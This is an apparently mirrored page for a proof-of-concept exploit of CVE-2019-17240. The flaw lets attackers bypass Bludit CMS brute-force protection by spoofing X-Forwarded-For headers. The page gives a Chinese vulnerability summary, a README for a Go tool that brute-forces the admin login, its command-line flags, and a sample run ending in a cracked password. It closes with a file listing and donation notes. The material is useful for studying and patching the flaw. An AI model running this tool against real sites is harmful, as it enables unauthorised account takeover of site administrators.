CVE-2019-17240 PoC — Bludit 安全漏洞

Source

https://github.com/spyx/cve-2019-17240

Associated Vulnerability

Title:Bludit 安全漏洞 (CVE-2019-17240)
Description:Bludit是一套开源的轻量级博客内容管理系统（CMS）。 Bludit 3.9.2版本中的bl-kernel/security.class.php文件存在安全漏洞。攻击者通过使用多个伪造的X-Forwarded-For或Client-IP HTTP标头利用该漏洞绕过保护机制。

Readme

## Bludit <= 3.9.22 - Bruteforce Mitigation Bypass

This is small project where I rewrite [this python script](https://www.exploit-db.com/exploits/48942) into golang. Purpose of this project was to learn Golang and understand how this exploit work.

### Usage

```bash
$ ./brutepass -sdasds                                                             
flag provided but not defined: -sdasds
Usage of ./brutepass:
  -c int
        Threads (default 5) (default 5)
  -l string
        Hostname eg... http://127.0.0.1/admin/login.php
  -p string
        Password file
  -u string
        Enter username
```

Except threads flag all other flags are mandantory.

```bash
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10 
Total requests sent: 20 
Total requests sent: 30 
Total requests sent: 40 
Total requests sent: 50 
Total requests sent: 60 
Total requests sent: 65 
==========Password Cracked=============
Password: Password
```

File Snapshot


 [4.0K]  /data/pocs/7818eb96a1437f3e23442a6b5c2ba998078c226f
├── [6.4M]  cve-2019-17240
├── [2.7K]  cve-2019-17240.go
├── [1.3K]  pass.txt
└── [ 986]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!